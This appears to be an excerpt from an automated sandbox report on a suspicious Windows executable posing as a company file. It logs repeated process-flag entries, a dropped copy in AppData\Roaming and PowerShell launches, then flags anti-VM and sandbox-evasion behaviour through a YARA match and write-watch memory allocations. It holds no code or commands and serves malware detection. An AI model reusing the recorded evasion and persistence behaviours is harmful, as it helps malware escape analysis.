Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: SS Bottmac Engineers Pvt. Ltd..exe PID: 5148, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RTUZKYTc.exe PID: 7324, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SS Bottmac Engineers Pvt. Ltd..exe PID: 1992, type: MEMORYSTR

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 1760000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 3130000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 5130000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 9470000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: A470000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: A680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: B680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: BAE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: CAE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: DAE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 3140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 3340000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 5340000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Memory allocated: 1240000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Memory allocated: 3000000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Memory allocated: 1480000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Memory allocated: 8CC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Memory allocated: 9CC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Memory allocated: 9EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Memory allocated: AEB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Memory allocated: B340000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Memory allocated: C340000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Memory allocated: D340000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Memory allocated: 1290000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Memory allocated: 2C30000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Memory allocated: 2A50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 1640000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 3110000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 2F10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 8F00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 7AB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 9F00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: AF00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: B530000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: C530000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: C20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 2950000 memory reserve \| memory write watch
